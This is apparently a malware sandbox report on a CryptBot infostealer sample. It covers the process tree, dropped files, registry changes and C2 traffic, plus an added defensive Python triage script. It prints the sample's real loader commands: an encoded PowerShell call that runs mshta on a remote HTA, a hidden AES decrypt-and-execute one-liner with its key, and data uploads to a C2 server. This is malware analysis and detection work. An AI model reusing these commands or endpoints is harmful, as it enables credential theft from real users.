Malware analysis verifyhuman476.b-cdn.net.ps1 Malicious activity | ANY.RUN - Malware Sandbox Online (2024)

File name:

verifyhuman476.b-cdn.net.ps1

Full analysis: https://app.any.run/tasks/3585f0a7-2500-47c5-9993-50b2c6f68c61
Verdict: Malicious activity
Threats:

CryptBot is an advanced Windows-targeting infostealer delivered via pirate sites offering "cracked" software. It was first observed in the wild in 2019.


Analysis date: August 08, 2024, 18:36:24
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:

stealer

cryptbot

Indicators:
MIME: text/plain
File info: ASCII text, with no line terminators
MD5:

9433ED9D985D6F93E0A168C417B7F01C

SHA1:

16F4FB0839CFB4D008537D87906AEE0621646C27

SHA256:
SSDEEP:

3:VSJJLNyAmarBanfknMVpvF7HMV20RtkpfhAi11H6Bto2kO7Heh:snyuW5VpvF7HMEvpfhJDH6ByDO7Hs

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report may have been distorted by user actions and is provided as is for the user's information. ANY.RUN does not guarantee the maliciousness or safety of the content.

  • MALICIOUS

    • Changes powershell execution policy (Unrestricted)

      • mshta.exe (PID: 7096)
    • Uses AES cipher (POWERSHELL)

      • powershell.exe (PID: 6164)
    • Gets or sets the initialization vector for the symmetric algorithm (POWERSHELL)

      • powershell.exe (PID: 6164)
    • Gets or sets the symmetric key that is used for encryption and decryption (POWERSHELL)

      • powershell.exe (PID: 6164)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 6164)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 6400)
    • Scans artifacts that could help determine the target

      • mshta.exe (PID: 7096)
    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 6164)
    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 6164)
    • Connects to the CnC server

      • svchost.exe (PID: 2256)
      • ShowbizFender.pif (PID: 7108)
    • CRYPTBOT has been detected (SURICATA)

      • svchost.exe (PID: 2256)
      • ShowbizFender.pif (PID: 7108)
    • Actions look like stealing of personal data

      • ShowbizFender.pif (PID: 7108)
  • SUSPICIOUS

    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 6400)
      • mshta.exe (PID: 7096)
    • Application launched itself

      • powershell.exe (PID: 6400)
    • Process drops legitimate windows executable

      • mshta.exe (PID: 7096)
      • powershell.exe (PID: 6164)
    • Drops the executable file immediately after the start

      • mshta.exe (PID: 7096)
      • powershell.exe (PID: 6164)
      • Setup.exe (PID: 6444)
      • more.com (PID: 1360)
    • Probably obfuscated PowerShell command line is found

      • mshta.exe (PID: 7096)
    • BASE64 encoded PowerShell command has been detected

      • powershell.exe (PID: 6400)
    • The process bypasses the loading of PowerShell profile settings

      • mshta.exe (PID: 7096)
    • Cryptography encrypted command line is found

      • powershell.exe (PID: 6164)
    • Base64-obfuscated command line is found

      • powershell.exe (PID: 6400)
    • Executable content was dropped or overwritten

      • mshta.exe (PID: 7096)
      • powershell.exe (PID: 6164)
      • Setup.exe (PID: 6444)
      • more.com (PID: 1360)
    • Extracts files to a directory (POWERSHELL)

      • powershell.exe (PID: 6164)
    • Writes data into a file (POWERSHELL)

      • powershell.exe (PID: 6164)
    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 6164)
    • Gets file extension (POWERSHELL)

      • powershell.exe (PID: 6164)
    • Starts application with an unusual extension

      • Setup.exe (PID: 6444)
      • more.com (PID: 1360)
    • Drops a file with a rarely used extension (PIF)

      • more.com (PID: 1360)
    • Searches for installed software

      • ShowbizFender.pif (PID: 7108)
  • INFO

    • Checks proxy server information

      • mshta.exe (PID: 7096)
      • powershell.exe (PID: 6164)
    • Reads Internet Explorer settings

      • mshta.exe (PID: 7096)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 6164)
    • Disables trace logs

      • powershell.exe (PID: 6164)
    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 6164)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 6164)
    • Checks supported languages

      • Setup.exe (PID: 6444)
      • more.com (PID: 1360)
      • StrCmp.exe (PID: 6280)
      • ShowbizFender.pif (PID: 7108)
    • Creates files or folders in the user directory

      • Setup.exe (PID: 6444)
    • Reads the computer name

      • Setup.exe (PID: 6444)
      • StrCmp.exe (PID: 6280)
      • more.com (PID: 1360)
      • ShowbizFender.pif (PID: 7108)
    • The executable file from the user directory is run by the Powershell process

      • Setup.exe (PID: 6444)
    • Create files in a temporary directory

      • more.com (PID: 1360)
      • Setup.exe (PID: 6444)
    • Reads the machine GUID from the registry

      • ShowbizFender.pif (PID: 7108)
    • Reads CPU info

      • ShowbizFender.pif (PID: 7108)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX in the full report.

No Malware configuration.

No data.


All screenshots are available in the full report


Total processes

141

Monitored processes

13

Malicious processes

8

Suspicious processes

Behavior graph


Process information

PID

CMD

Path

Indicators

Parent process

PID: 6400
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass C:\Users\admin\AppData\Local\Temp\verifyhuman476.b-cdn.net.ps1
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: explorer.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows PowerShell

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images

c:\windows\system32\windowspowershell\v1.0\powershell.exe

c:\windows\system32\ntdll.dll

c:\windows\system32\kernel32.dll

c:\windows\system32\kernelbase.dll

c:\windows\system32\msvcrt.dll

c:\windows\system32\oleaut32.dll

c:\windows\system32\msvcp_win.dll

c:\windows\system32\ucrtbase.dll

c:\windows\system32\combase.dll

c:\windows\system32\rpcrt4.dll

PID: 6408
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Console Window Host

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images

c:\windows\system32\conhost.exe

c:\windows\system32\ntdll.dll

c:\windows\system32\kernel32.dll

c:\windows\system32\kernelbase.dll

c:\windows\system32\msvcp_win.dll

c:\windows\system32\ucrtbase.dll

c:\windows\system32\shcore.dll

c:\windows\system32\msvcrt.dll

c:\windows\system32\combase.dll

c:\windows\system32\rpcrt4.dll

PID: 6808
CMD: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAaAB0AHQAcABzADoALwAvAG0AaQBjAHIAbwBzAG8AZgB0AGMAYQBtAHAALQB2ADEALgBiAC0AYwBkAG4ALgBuAGUAdAAvAG0AaQBjAHIAbwAtAHYAMQA=
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: powershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows PowerShell

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images

c:\windows\system32\windowspowershell\v1.0\powershell.exe

c:\windows\system32\ntdll.dll

c:\windows\system32\kernel32.dll

c:\windows\system32\kernelbase.dll

c:\windows\system32\msvcrt.dll

c:\windows\system32\oleaut32.dll

c:\windows\system32\msvcp_win.dll

c:\windows\system32\ucrtbase.dll

c:\windows\system32\atl.dll

c:\windows\system32\combase.dll

PID: 7096
CMD: "C:\WINDOWS\system32\mshta.exe" https://microsoftcamp-v1.b-cdn.net/micro-v1
Path: C:\Windows\System32\mshta.exe
Parent process: powershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Microsoft (R) HTML Application host

Exit code:

Version:

11.00.19041.1 (WinBuild.160101.0800)

Modules

Images

c:\windows\system32\mshta.exe

c:\windows\system32\ntdll.dll

c:\windows\system32\kernel32.dll

c:\windows\system32\kernelbase.dll

c:\windows\system32\msvcrt.dll

c:\windows\system32\advapi32.dll

c:\windows\system32\sechost.dll

c:\windows\system32\rpcrt4.dll

c:\windows\system32\bcrypt.dll

c:\windows\system32\wldp.dll

PID: 6164
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function RbIcrhkL($BaAb){return -split ($BaAb -replace '..', '0x$& ')};$VKDfBkU = RbIcrhk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vkWTG = [System.Security.Cryptography.Aes]::Create();$vkWTG.Key = RbIcrhkL('6B644D67514D625170774950714F5359');$vkWTG.IV = New-Object byte[] 16;$FDxCnWus = $vkWTG.CreateDecryptor();$QHPEsJoUj = $FDxCnWus.TransformFinalBlock($VKDfBkU, 0, $VKDfBkU.Length);$rfPIxZhDh = [System.Text.Encoding]::Utf8.GetString($QHPEsJoUj);$FDxCnWus.Dispose();& $rfPIxZhDh.Substring(0,3) $rfPIxZhDh.Substring(3)
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: mshta.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows PowerShell

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images

c:\windows\system32\windowspowershell\v1.0\powershell.exe

c:\windows\system32\ntdll.dll

c:\windows\system32\kernel32.dll

c:\windows\system32\kernelbase.dll

c:\windows\system32\msvcrt.dll

c:\windows\system32\oleaut32.dll

c:\windows\system32\msvcp_win.dll

c:\windows\system32\ucrtbase.dll

c:\windows\system32\atl.dll

c:\windows\system32\combase.dll

PID: 460
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Console Window Host

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images

c:\windows\system32\conhost.exe

c:\windows\system32\ntdll.dll

c:\windows\system32\kernel32.dll

c:\windows\system32\kernelbase.dll

c:\windows\system32\msvcp_win.dll

c:\windows\system32\ucrtbase.dll

c:\windows\system32\shcore.dll

c:\windows\system32\msvcrt.dll

c:\windows\system32\combase.dll

c:\windows\system32\rpcrt4.dll

PID: 6476
CMD: C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Path: C:\Windows\System32\rundll32.exe
Parent process: svchost.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows host process (Rundll32)

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images

c:\windows\system32\rundll32.exe

c:\windows\system32\ntdll.dll

c:\windows\system32\kernel32.dll

c:\windows\system32\kernelbase.dll

c:\windows\system32\msvcrt.dll

c:\windows\system32\combase.dll

c:\windows\system32\ucrtbase.dll

c:\windows\system32\rpcrt4.dll

c:\windows\system32\shcore.dll

c:\windows\system32\imagehlp.dll

PID: 6444
CMD: "C:\Users\admin\AppData\Local\Temp\Setup.exe"
Path: C:\Users\admin\AppData\Local\Temp\Setup.exe
Parent process: powershell.exe

User:

admin

Company:

Florian Heidenreich

Integrity Level:

MEDIUM

Description:

Mp3tag - the universal Tag editor

Exit code:

1

Version:

3.26.0.0

Modules

Images

c:\users\admin\appdata\local\temp\setup.exe

c:\windows\system32\ntdll.dll

c:\windows\system32\kernel32.dll

c:\windows\system32\kernelbase.dll

c:\windows\system32\shlwapi.dll

c:\windows\system32\msvcrt.dll

c:\windows\system32\user32.dll

c:\windows\system32\win32u.dll

c:\windows\system32\gdi32.dll

c:\windows\system32\gdi32full.dll

PID: 6280
CMD: C:\Users\admin\AppData\Roaming\lv_op\SPSTDKDRMQDIWOTNDVPR\StrCmp.exe
Path: C:\Users\admin\AppData\Roaming\lv_op\SPSTDKDRMQDIWOTNDVPR\StrCmp.exe
Parent process: Setup.exe

User:

admin

Company:

aaa

Integrity Level:

MEDIUM

Version:

1.00

Modules

Images

c:\users\admin\appdata\roaming\lv_op\spstdkdrmqdiwotndvpr\strcmp.exe

c:\windows\system32\ntdll.dll

c:\windows\syswow64\ntdll.dll

c:\windows\system32\wow64.dll

c:\windows\system32\wow64win.dll

c:\windows\system32\wow64cpu.dll

c:\windows\syswow64\kernel32.dll

c:\windows\syswow64\kernelbase.dll

c:\windows\syswow64\apphelp.dll

c:\windows\syswow64\msvbvm60.dll

PID: 1360
CMD: C:\WINDOWS\SysWOW64\more.com
Path: C:\Windows\SysWOW64\more.com
Parent process: Setup.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

More Utility

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images

c:\windows\syswow64\more.com

c:\windows\system32\ntdll.dll

c:\windows\syswow64\ntdll.dll

c:\windows\system32\wow64.dll

c:\windows\system32\wow64win.dll

c:\windows\system32\wow64cpu.dll

c:\windows\syswow64\kernel32.dll

c:\windows\syswow64\kernelbase.dll

c:\windows\syswow64\msvcrt.dll

c:\windows\syswow64\ulib.dll
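The process table above records a four-hop loader: the dropped .ps1 (PID 6400) starts a second powershell.exe with an -eC (EncodedCommand) argument (PID 6808), that decodes to the mshta.exe launch of https://microsoftcamp-v1.b-cdn.net/micro-v1 seen as PID 7096, and the HTA in turn starts powershell.exe (PID 6164) with a hidden window, Unrestricted execution policy, no profile, and an inline AES-128 decryptor whose key is given as a hex string, whose IV is sixteen zero bytes (CBC with PKCS7 padding is the .NET default for Aes.Create()), and whose plaintext is executed by splitting off the first three characters as the command name. The following Python script is an added example written for this page, not ANY.RUN tooling and not code from the sample. It triages those command lines offline: it decodes the -eC payload, replicates the RbIcrhkL helper to show that the obfuscated hex routine yields the literal 16-byte ASCII key, applies a small set of command-line heuristics (the heuristic names are the example's own, not ANY.RUN signature names), and walks the recorded parent/child edges. It cannot recover the next stage because the ciphertext passed to RbIcrhkL is not reproduced in this report; the PID 6164 line is embedded only as far as the report shows it.

```python
"""Offline triage of the command lines captured in this report.

Added example for this page (not ANY.RUN tooling, not code from the sample).
Inputs are copied from the process table; the PID 6164 line is reproduced
only as far as the report shows it. Nothing here runs the sample.
"""
import base64
import re
from typing import Dict, List, Optional, Tuple

# Command lines as recorded by the sandbox.
CMD_6400 = r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass C:\Users\admin\AppData\Local\Temp\verifyhuman476.b-cdn.net.ps1'
CMD_6808 = r'"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAaAB0AHQAcABzADoALwAvAG0AaQBjAHIAbwBzAG8AZgB0AGMAYQBtAHAALQB2ADEALgBiAC0AYwBkAG4ALgBuAGUAdAAvAG0AaQBjAHIAbwAtAHYAMQA='
CMD_7096 = r'"C:\WINDOWS\system32\mshta.exe" https://microsoftcamp-v1.b-cdn.net/micro-v1'
CMD_6164 = (  # visible part of the PID 6164 line; the ciphertext is not in the report
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop '
    r"function RbIcrhkL($BaAb){return -split ($BaAb -replace '..', '0x$& ')};"
    r"$vkWTG = [System.Security.Cryptography.Aes]::Create();"
    r"$vkWTG.Key = RbIcrhkL('6B644D67514D625170774950714F5359');$vkWTG.IV = New-Object byte[] 16;"
    r"$FDxCnWus = $vkWTG.CreateDecryptor();"
    r"& $rfPIxZhDh.Substring(0,3) $rfPIxZhDh.Substring(3)"
)

# powershell.exe accepts any unambiguous prefix of a parameter name: -e, -ec and
# -enc... all mean -EncodedCommand, while -ep / -ex mean -ExecutionPolicy.
_ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc[a-z]*)\s+([A-Za-z0-9+/=]+)")

# Heuristics for a powershell.exe / mshta.exe command line (names are this example's own).
_CHECKS = [
    ("hidden-window", re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+(?:1|hidden)\b")),
    ("exec-policy-bypass", re.compile(r"(?i)(?:^|\s)-e(?:x(?:ecutionpolicy)?|p)\s+(?:bypass|unrestricted)\b")),
    ("no-profile", re.compile(r"(?i)(?:^|\s)-nop(?:rofile)?\b")),
    ("encoded-command", _ENC_RE),
    ("aes-in-cmdline", re.compile(r"(?i)Security\.Cryptography\.Aes|CreateDecryptor|TransformFinalBlock")),
    ("dynamic-invoke", re.compile(r"&\s*\$\w+\.Substring\(0,\s*3\)")),  # "& $s.Substring(0,3) $s.Substring(3)"
    ("mshta-remote-hta", re.compile(r'(?i)mshta(?:\.exe)?"?\s+https?://')),
]


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")


def hex_bytes_like_rbicrhkl(hexstr: str) -> bytes:
    """Replicates the script's RbIcrhkL helper: `-replace '..', '0x$& '` rewrites each
    hex pair as a '0xNN ' token, unary `-split` breaks on whitespace, and PowerShell
    coerces the '0xNN' strings to bytes on assignment to Aes.Key. Net effect: hex decode."""
    tokens = re.sub(r"..", lambda m: "0x" + m.group(0) + " ", hexstr).split()
    return bytes(int(t, 16) for t in tokens)


def triage(cmdline: str) -> Dict[str, object]:
    """Heuristics that fire, plus any decoded -EncodedCommand payload."""
    return {
        "hits": [name for name, rx in _CHECKS if rx.search(cmdline)],
        "decoded": decode_encoded_command(cmdline),
    }


# (pid, image path, parent image) as recorded in the process table.
PROCESS_TABLE = [
    (6400, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "explorer.exe"),
    (6808, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe"),
    (7096, r"C:\Windows\System32\mshta.exe", "powershell.exe"),
    (6164, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "mshta.exe"),
    (6444, r"C:\Users\admin\AppData\Local\Temp\Setup.exe", "powershell.exe"),
    (6280, r"C:\Users\admin\AppData\Roaming\lv_op\SPSTDKDRMQDIWOTNDVPR\StrCmp.exe", "Setup.exe"),
    (1360, r"C:\Windows\SysWOW64\more.com", "Setup.exe"),
]
SCRIPT_HOSTS = {"powershell.exe", "mshta.exe"}
LOLBINS = SCRIPT_HOSTS | {"more.com", "rundll32.exe"}


def odd_lineage(table) -> List[Tuple[int, str]]:
    """Edges worth a second look: script host -> LOLBin, script host -> binary under
    the user profile, or more.com spawned by something other than a shell."""
    odd = []
    for pid, path, parent in table:
        child = path.rsplit("\\", 1)[-1].lower()
        if parent in SCRIPT_HOSTS and child in LOLBINS:
            odd.append((pid, f"{parent} -> {child}"))
        elif parent in SCRIPT_HOSTS and "\\users\\" in path.lower():
            odd.append((pid, f"{parent} -> user-profile binary {child}"))
        elif child == "more.com" and parent.lower() not in {"cmd.exe", "powershell.exe"}:
            odd.append((pid, f"{parent} -> more.com"))
    return odd


if __name__ == "__main__":
    for pid, cmd in ((6400, CMD_6400), (6808, CMD_6808), (7096, CMD_7096), (6164, CMD_6164)):
        print(pid, triage(cmd))
    print("AES key:", hex_bytes_like_rbicrhkl("6B644D67514D625170774950714F5359"))
    print("lineage:", odd_lineage(PROCESS_TABLE))
```

Two details the decoded values make visible: the -eC payload is exactly the mshta.exe command line the sandbox recorded as PID 7096, so the .ps1 never touches the network itself and the download happens inside the HTA host; and the AES key is the ASCII string kdMgQMbQpwIPqOSY, fixed and embedded alongside a zero IV, so the encryption is obfuscation against static matching rather than protection, and an analyst who recovers the HTA body can decrypt the next stage with the same key and no further secrets. The -e prefix handling in the regex matters in practice: a rule that only looks for -EncodedCommand or -enc misses the -eC spelling used here.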

Total events

24506

Read events

24473

Write events

33

Delete events

Modification events

PID: 7096 (mshta.exe)
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: ProxyBypass
Value: 1

PID: 7096 (mshta.exe)
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: IntranetName
Value: 1

PID: 7096 (mshta.exe)
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: UNCAsIntranet
Value: 1

PID: 7096 (mshta.exe)
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: AutoDetect
Value:

PID: 7096 (mshta.exe)
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation: write
Name: CachePrefix
Value:

PID: 7096 (mshta.exe)
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation: write
Name: CachePrefix
Value: Cookie:

PID: 7096 (mshta.exe)
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation: write
Name: CachePrefix
Value: Visited:

PID: 6164 (powershell.exe)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation: write
Name: EnableFileTracing
Value:

PID: 6164 (powershell.exe)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation: write
Name: EnableAutoFileTracing
Value:

PID: 6164 (powershell.exe)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation: write
Name: EnableConsoleTracing
Value:

Executable files

14

Suspicious files

16

Text files

6

Unknown types

Dropped files

PID

Process

Filename

Type

PID: 7096
Process: mshta.exe
Filename: C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
Type: binary
MD5: 51883DF11BA0F75D2AAD9E88EBD057DC
SHA256: 1CC443E507D740FEDC646DCA7116EEAD8084ED9B7C70ABBB34281DD1E7DBBA10

PID: 7096
Process: mshta.exe
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\AH8CR9J5\micro-v1[1]
Type: executable
MD5: DE219CB5F5073BE86D74F4BEE29D9E79
SHA256: 0581756A656ACE2E7D164B1F66846E9D079755BD7A5CEAD72E73B53AB534531B

PID: 6400
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xrid0nuv.un3.psm1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 6164
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_jmqnz03m.03m.ps1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 6164
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_vtasglp0.4rb.psm1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 6808
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_qiw3vsdx.vos.psm1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 6808
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_05pqx1ea.0uz.ps1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 6164
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\K1.zip
Type: compressed
MD5: F0E4E16FEB8B7B8E95D81A7F5807164B
SHA256: AD12C4695218510096F7B75E699A106F877D378B66DD11F86783AC2C40B432C8

PID: 6164
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\caramel.eps
Type: binary
MD5: E94BB41E97E1D8E1EAA638191A74490A
SHA256: F59A54633E14187EEB907F91C747D0E8B6FB5A970B9CDDED15800B487F20239A

PID: 6400
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_b2y0hfgw.k42.ps1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

Download PCAP, analyze network streams, HTTP content and a lot more in the full report.

HTTP(S) requests

10

TCP/UDP connections

49

DNS requests

24

Threats

HTTP requests

PID

Process

Method

HTTP Code

IP

URL

CN

Type

Size

Reputation

7096

mshta.exe

GET

200

172.64.149.23:80

http://ocsp.sectigo.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRDC9IOTxN6GmyRjyTl2n4yTUczyAQUjYxexFStiuF36Zv5mwXhuAGNYeECEQCb80pEPlZ04x2fAu4YLy1O

unknown

unknown

6572

backgroundTaskHost.exe

GET

200

192.229.221.95:80

http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D

unknown

unknown

6600

backgroundTaskHost.exe

GET

200

192.229.221.95:80

http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D

unknown

unknown

7096

mshta.exe

GET

200

104.18.38.233:80

http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTNMNJMNDqCqx8FcBWK16EHdimS6QQUU3m%2FWqorSs9UgOHYm8Cd8rIDZssCEH1bUSa0droR23QWC7xTDac%3D

unknown

unknown

7096

mshta.exe

GET

200

104.18.38.233:80

http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTtU9uFqgVGHhJwXZyWCNXmVR5ngQUoBEKIz6W8Qfs4q8p74Klf9AwpLQCEDlyRDr5IrdR19NsEN0xNZU%3D

unknown

unknown

1124

svchost.exe

GET

200

192.229.221.95:80

http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D

unknown

unknown

5336

SearchApp.exe

GET

200

192.229.221.95:80

http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D

unknown

unknown

7108

ShowbizFender.pif

POST

200

185.173.38.84:80

http://cveight8ht.top/v1/upload.php

unknown

unknown

7108

ShowbizFender.pif

POST

200

185.173.38.84:80

http://cveight8ht.top/v1/upload.php

unknown

unknown

7108

ShowbizFender.pif

POST

200

185.173.38.84:80

http://cveight8ht.top/v1/upload.php

unknown

unknown


Connections

PID

Process

IP

Domain

ASN

CN

Reputation

1860

svchost.exe

20.73.194.208:443

settings-win.data.microsoft.com

MICROSOFT-CORP-MSN-AS-BLOCK

NL

whitelisted

3888

svchost.exe

239.255.255.250:1900

whitelisted

2120

MoUsoCoreWorker.exe

20.73.194.208:443

settings-win.data.microsoft.com

MICROSOFT-CORP-MSN-AS-BLOCK

NL

whitelisted

20.73.194.208:443

settings-win.data.microsoft.com

MICROSOFT-CORP-MSN-AS-BLOCK

NL

whitelisted

4

System

192.168.100.255:138

whitelisted

3260

svchost.exe

40.113.103.199:443

client.wns.windows.com

MICROSOFT-CORP-MSN-AS-BLOCK

NL

whitelisted

1124

svchost.exe

40.126.32.140:443

login.live.com

MICROSOFT-CORP-MSN-AS-BLOCK

NL

unknown

5336

SearchApp.exe

184.86.251.23:443

www.bing.com

Akamai International B.V.

DE

unknown

1124

svchost.exe

192.229.221.95:80

ocsp.digicert.com

EDGECAST

US

whitelisted

5336

SearchApp.exe

192.229.221.95:80

ocsp.digicert.com

EDGECAST

US

whitelisted

DNS requests

Domain

IP

Reputation

settings-win.data.microsoft.com

  • 20.73.194.208
  • 4.231.128.59

whitelisted

google.com

  • 142.250.186.110

whitelisted

client.wns.windows.com

  • 40.113.103.199

whitelisted

login.live.com

  • 40.126.32.140
  • 20.190.160.17
  • 40.126.32.134
  • 40.126.32.74
  • 40.126.32.68
  • 20.190.160.22
  • 40.126.32.76
  • 20.190.160.20

whitelisted

www.bing.com

  • 184.86.251.23
  • 184.86.251.14
  • 184.86.251.10
  • 184.86.251.27
  • 184.86.251.24
  • 184.86.251.9
  • 184.86.251.5
  • 184.86.251.22
  • 184.86.251.11

whitelisted

ocsp.digicert.com

  • 192.229.221.95

whitelisted

microsoftcamp-v1.b-cdn.net

  • 169.150.247.33

unknown

ocsp.comodoca.com

  • 104.18.38.233
  • 172.64.149.23

whitelisted

th.bing.com

  • 184.86.251.25
  • 184.86.251.9
  • 184.86.251.28
  • 184.86.251.14
  • 184.86.251.23
  • 184.86.251.11
  • 184.86.251.22
  • 184.86.251.4
  • 184.86.251.24

whitelisted

ocsp.usertrust.com

  • 104.18.38.233
  • 172.64.149.23

